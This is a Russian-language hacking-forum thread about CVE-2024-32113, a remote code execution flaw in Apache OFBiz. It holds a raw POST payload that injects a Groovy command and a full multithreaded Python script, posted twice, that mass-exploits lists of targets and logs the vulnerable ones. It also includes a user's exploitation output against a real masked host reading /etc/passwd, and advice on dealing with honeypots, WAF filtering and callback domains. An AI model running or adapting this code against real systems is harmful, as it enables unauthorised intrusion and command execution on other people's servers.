• XSS.stack #1 – первый литературный журнал от юзеров форума

Remote CVE-2024-32113 - Apache OFBIZ RCE

Отслеживать
rwxrwx

rwxrwx

(L3) cache
Пользователь
Регистрация
15.01.2023
Сообщения
280
Реакции
100
Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') vulnerability in Apache OFBiz.This issue affects Apache OFBiz: before 12/18/13. Users are recommended to upgrade to version 12/18/13, which fixes the issue.

FOFA: app="Apache_OFBiz"
- 3146 Results

POC:
POST /webtools/control/forgotPassword;/ProgramExport HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 127.0.0.1:8443

groovyProgram=throw+new+Exception('id'.execute().text);

src: https://github.com/Mr-xn/CVE-2024-32113
 
Последнее редактирование:
CVE-2024-32113 Apache OFBIZ Batch Scanning

CVE-2024-32113 Batch Scanning :

Python: 
import requests
from requests.packages.urllib3.exceptions import InsecureRequestWarning
import warnings
import sys
import re
import argparse
from concurrent.futures import ThreadPoolExecutor, as_completed

warnings.simplefilter('ignore',InsecureRequestWarning)
def banner():
    banner = """
    \n
    ***********************************************
    *              Apache OFBiz                   *
    *       CVE-2024-32113 Batch Scanning         *
    *            PowerBy: YongYe-Security         *
    ***********************************************
    \n
    """
    print(banner)
def Target_File(filename):
    ip_addresses = []
    with open(filename, 'r') as file:
        for line in file:
            url = line.strip()
            if url.startswith('https://'):
                ip_addresses.append(url)
            else:
                ip_addresses.append('http://' + url)
    return ip_addresses
def CheckTarget(ip,cmd):
    url = f'{ip}/webtools/control/forgotPassword;/ProgramExport'
    headers = {
        'User-Agent': 'Mozilla/999.0 (Windows 3200; Win x12400) Chrome/888.0.7.2 Safari/537.36',
        'Content-Type': 'application/x-www-form-urlencoded'
    }
    data = {'groovyProgram': f"throw new Exception('{cmd}'.execute().text);"}
    try:
        response = requests.post(url, headers=headers, data=data, timeout=5, verify=False)
        response_text = response.text
        match = re.search(r'java\.lang\.Exception:(.*)', response_text)
        if match:
            exception_details = match.group(1).strip()
            print(f'[+] {ip}\t\t{exception_details}')
            with open('Out.txt', 'a') as out_file:
                out_file.write(f'{ip}\n')
        else:
            print(f'[-] {ip}')
    except Exception:
        pass

def main():
    banner()
    parser = argparse.ArgumentParser(description='CVE-2024-32113 Batch Scanning')
    parser.add_argument('-f', '--file', required=True, help='Target File')
    parser.add_argument('-c', '--cmd', default='id', help='command')
    args = parser.parse_args()
    ip_addresses = Target_File(args.file)
    with ThreadPoolExecutor(max_workers=10) as executor:
        futures = [executor.submit(CheckTarget,ip,args.cmd) for ip in ip_addresses]
        for future in as_completed(futures):
            pass

if __name__ == "__main__":
    main()

Help


Код: 
CVE-2024-32113 Batch Scanning

optional arguments:
-h, --help            show this help message and exit
-f FILE, --file FILE  Target File
-c CMD, --cmd CMD     command


Batch Scanning
The -c parameter is optional and defaults to id is. The scan result is Out.txt(vulnerable target).

The -c parameter is optional, defaulting to id. Scan results are saved in Out.txt (targets with vulnerabilities).

The -c parameter is optional and defaults to id. Scan results are saved inOut.txt(vulnerable target).

Код: 
python3 CVE-2024-32113.py -f TargetFile.txt

1723018935164.png



Source Github : https://github.com/YongYe-Security/CVE-2024-32113
 
hmm
blackhunt сказал(а):
CVE-2024-32113 Apache OFBIZ Batch Scanning

CVE-2024-32113 Batch Scanning :

Python: 
import requests
from requests.packages.urllib3.exceptions import InsecureRequestWarning
import warnings
import sys
import re
import argparse
from concurrent.futures import ThreadPoolExecutor, as_completed

warnings.simplefilter('ignore',InsecureRequestWarning)
def banner():
    banner = """
    \n
    ***********************************************
    *              Apache OFBiz                   *
    *       CVE-2024-32113 Batch Scanning         *
    *            PowerBy: YongYe-Security         *
    ***********************************************
    \n
    """
    print(banner)
def Target_File(filename):
    ip_addresses = []
    with open(filename, 'r') as file:
        for line in file:
            url = line.strip()
            if url.startswith('https://'):
                ip_addresses.append(url)
            else:
                ip_addresses.append('http://' + url)
    return ip_addresses
def CheckTarget(ip,cmd):
    url = f'{ip}/webtools/control/forgotPassword;/ProgramExport'
    headers = {
        'User-Agent': 'Mozilla/999.0 (Windows 3200; Win x12400) Chrome/888.0.7.2 Safari/537.36',
        'Content-Type': 'application/x-www-form-urlencoded'
    }
    data = {'groovyProgram': f"throw new Exception('{cmd}'.execute().text);"}
    try:
        response = requests.post(url, headers=headers, data=data, timeout=5, verify=False)
        response_text = response.text
        match = re.search(r'java\.lang\.Exception:(.*)', response_text)
        if match:
            exception_details = match.group(1).strip()
            print(f'[+] {ip}\t\t{exception_details}')
            with open('Out.txt', 'a') as out_file:
                out_file.write(f'{ip}\n')
        else:
            print(f'[-] {ip}')
    except Exception:
        pass

def main():
    banner()
    parser = argparse.ArgumentParser(description='CVE-2024-32113 Batch Scanning')
    parser.add_argument('-f', '--file', required=True, help='Target File')
    parser.add_argument('-c', '--cmd', default='id', help='command')
    args = parser.parse_args()
    ip_addresses = Target_File(args.file)
    with ThreadPoolExecutor(max_workers=10) as executor:
        futures = [executor.submit(CheckTarget,ip,args.cmd) for ip in ip_addresses]
        for future in as_completed(futures):
            pass

if __name__ == "__main__":
    main()

Help


Код: 
CVE-2024-32113 Batch Scanning

optional arguments:
-h, --help            show this help message and exit
-f FILE, --file FILE  Target File
-c CMD, --cmd CMD     command


Batch Scanning
The -c parameter is optional and defaults to id is. The scan result is Out.txt(vulnerable target).

The -c parameter is optional, defaulting to id. Scan results are saved in Out.txt (targets with vulnerabilities).

The -c parameter is optional and defaults to id. Scan results are saved inOut.txt(vulnerable target).

Код: 
python3 CVE-2024-32113.py -f TargetFile.txt

Посмотреть вложение 92048


Source Github : https://github.com/YongYe-Security/CVE-2024-32113
hmm nicely done. more complete code!
 
Пожалуйста, обратите внимание, что пользователь заблокирован
Что с ним по итогу? ответ 200 как обычно в мусор? кодер в отпуске по вэбу, готов с кем нибудь поработать! У этого https://github.com/ThatNotEasy/CVE-2024-38856/blob/main/CVE-2024-38856.py больше вариантов путей, но 1к таргетов прокатываешь минусом все ответа нет.
[*] Options Passed:
target: https://ххх.2хх.1х8.7х
port: 8443
command: cat /etc/passwd
scan: False
domain: None
file: None
output: None
proxy: None
exploit: True
timeout: 10
[!] Exploit executed, but no output found in the response :
[+] Target: https://ххх.2хх.1х8.7х, Port: 8443
[+] Status Code: 200
 
Пожалуйста, обратите внимание, что пользователь заблокирован
KeyBit сказал(а):
What happened to him in the end? Response 200 as usual in the trash? The coder is on vacation on the web, ready to work with someone! This https://github.com/ThatNotEasy/CVE-2024-38856/blob/main/CVE-2024-38856.py has more path options, but you roll 1k targets with a minus and still no response.
[*] Options Passed:
target: https://xxx.2xx.1x8.7x
port: 8443
command: cat /etc/passwd
scan: False
domain: None
file: None
output: None
proxy: None
exploit: True
timeout: 10
[!] Exploit executed, but no output found in the response :
[+] Target: https://ххх.2хх.1х8.7х , Port: 8443
[+] Status Code: 200
Hi

the topic is about different vulnerability , but what the problem did you have on CVE-2024-38856 ?

use this script instead maybe you got new results : https://github.com/securelayer7/CVE-2024-38856_Scanner

please note that for test and found vulnerable instances use -d switch and supply domain to get ping back.

sometimes you got 200 response but you didnt have ping back on domain , that the multi situations maybe about it :

1- you are on honeypot

2- the target is vulnerable but the domain is block on the send request side , multiple domains are filtered sometimes on instances firewall , for example domain of interact.sh or free domain of ngrok sometimes block on firewall or WAF

3 - maybe your payload blocked before hit on target , try bypass method

but if you dont have these problems , pocs that publicly available on internet or github are useful , i got ping back from list of 10 target randomly using the script i mention above . if your instance didnt have vulnerability you will face 401 or 403 response

good luck
 
admin


Напишите ответ...
  • Вставить:
Прикрепить файлы
Верх